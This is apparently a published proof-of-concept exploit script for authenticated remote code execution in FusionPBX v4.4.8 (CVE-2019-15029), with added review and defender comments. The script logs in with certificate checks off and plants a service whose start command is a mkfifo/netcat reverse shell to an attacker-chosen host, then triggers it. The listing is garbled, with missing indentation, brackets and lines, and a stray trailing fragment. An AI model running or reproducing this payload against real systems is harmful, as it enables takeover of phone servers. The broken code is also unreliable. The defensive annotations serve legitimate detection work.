
Last active June 15, 2020 02:39
# Exploit Title: FusionPBX v4.4.8 authenticated Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage:
# Software link:
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup
# NOTE(review): this listing is incomplete as captured. Indentation, closing
# brackets, what look like else branches, and parts of several expressions are
# missing, so it does not parse as Python. The comments below describe only
# what the visible lines show.
#
# Silence UserWarning messages raised from the bs4 module. The
# InsecureRequestWarning imported above is not suppressed by any visible line.
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
# Expect exactly five arguments: url, username, password, ip, port.
# No exit call is visible after the usage text in this capture.
if len(sys.argv) != 6:
print("[~] Usage : ./ url username password ip port")
print("[~] ./ admin p@$$word 1337")
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
# One requests session is reused for every call, so cookies set at login are
# sent with the later requests.
request = requests.session()
# Login form fields, taken from the command line.
login_info = {
"username": username,
"password": password
# Login request; only its trailing arguments survive in this capture.
# verify=False turns off TLS certificate validation on this and every later
# request, so the credentials are sent without authenticating the server.
login_request =
login_info, verify=False
# Success is inferred from the absence of the error string in the response
# body, so any other response (including an unrelated error page) is treated
# as a successful login.
if "Invalid Username and/or Password" not in login_request.text:
print("[+] Logged In Sucssfully")
print("[+] Error with creds")
# Service management endpoints under /app/services/ used by the script.
service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
# Form fields for a new service definition, submitted with the logged-in
# session. The issue is described in the header as authenticated (CVE-2019-15029).
payload_info = {
# the service name you want to create
# this value contains the payload , you can change it as you want
# Defender note: service_cmd_start is a free-form shell command string. A
# stored service whose start command contains shell metacharacters, or tools
# such as mkfifo and nc, is a strong indicator of compromise and is worth
# auditing alongside applying the vendor fix for the CVE named above.
"service_cmd_start":"rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 1337 >/tmp/f",
}, payload_info, verify=False)
# Fetch the services list and parse it with the lxml parser to recover the id
# of the entry just submitted.
html_page = request.get(services_page, verify=False)
soup = BeautifulSoup(html_page.text, "lxml")
# Check every element carrying an href for the marker "PwnedService" and take
# the text after the first "=" in its href as the service id.
# NOTE(review): the line that would set this service name is not in the
# capture. A service called "PwnedService" in the services list suggests the
# script was run as published; confirm against the services table.
for a in soup.find_all(href=True):
if "PwnedService" in a:
sid = a["href"].split("=")[1]
# Request the start action (a=start) for that service id. As written this is a
# plain GET, so the action is triggered as a side effect of a GET request.
# NOTE(review): presumably the stored start command then runs under the web
# application's account; confirm. Process-creation monitoring for shells
# spawned by the web/PHP worker is the relevant detection.
service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)

Could you contact me on your
